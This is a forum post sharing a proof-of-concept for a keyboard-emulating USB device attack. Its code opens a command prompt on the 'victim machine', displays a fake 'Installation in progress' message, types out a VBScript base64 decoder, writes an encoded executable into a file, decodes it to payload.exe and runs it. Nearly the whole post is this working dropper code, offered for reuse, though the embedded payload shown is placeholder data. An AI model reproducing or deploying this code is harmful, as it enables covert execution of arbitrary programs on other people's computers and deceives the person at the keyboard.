Everything posted by marked

  1. Hi all, I was working on the same topic, so I can share my Poc. I used the same encoding technique that you are talking about (base64 in vbs) and writing the payload and the vbs on the victim machine. Here is the code, works fine for me with an asm downloader of 1Ko (env. 3 sec. to execute the loop): #include <phukdlib.h> #include <avr/pgmspace.h> // // binary copy download and execute payload // // 25.05.2011 char vbsString[] = "echo Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject(\"Scripting.FileSystemObject\"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject(\"Microsoft.XMLDOM\"):Set EL = DM.createElement(\"tmp\"):EL.DataType = \"bin.base64\":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject(\"ADODB.Stream\"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub > script.vbs & cls" ; #include <avr/pgmspace.h> // put the encoded exe payload here prog_char string_0[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > pl.dat & cls"; prog_char string_1[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_2[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_3[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_4[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; 
prog_char string_5[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_6[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5m >> pl.dat & cls"; prog_char string_7[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_8[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_9[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_10[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_11[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_12[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_13[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_14[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_15[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_16[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_17[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_18[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; prog_char string_19[] PROGMEM = "echo AA== >> pl.dat"; // Then set up a table to refer to your strings. 
PROGMEM const char *string_table[] = { string_0, string_1, string_2, string_3, string_4, string_5, string_6, string_7, string_8, string_9, string_10, string_11, string_12, string_13, string_14, string_15, string_16, string_17, string_18, string_19}; char buffer[100]; void setup() { delay(20000); pinMode(11, OUTPUT); digitalWrite(11, HIGH); delay(50); sendWinKey () ; delay(500); Keyboard.println("cmd"); //"cmd /t:ab" //delay(500); //ShrinkCurWinMSWIN(); delay(500); Keyboard.print("msg "); sendAsterixKey (); Keyboard.println(Installation in progress... - Please Wait "); delay(50); sendVbs(); } void loop() { } void sendVbs () { Keyboard.println(vbsString); for (int i = 0; i < 20; i++) { strcpy_P(buffer, (char*)pgm_read_word(&(string_table[i]))); Keyboard.println(buffer); delay(50); } Keyboard.println("cscript script.vbs pl.dat payload.exe & cls"); Keyboard.println("payload.exe & cls"); // run payload Keyboard.println("exit"); // run payload } void sendPlusKey () { Keyboard.set_key1(KEYPAD_PLUS); Keyboard.send_now(); Keyboard.set_key1(0); // reset key state Keyboard.send_now(); } void sendAsterixKey () { Keyboard.set_key1(KEYPAD_ASTERIX); Keyboard.send_now(); Keyboard.set_key1(0); // reset key state Keyboard.send_now(); } void sendWinKey () { Keyboard.set_modifier(128); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } Any ideas are welcome. Cheers.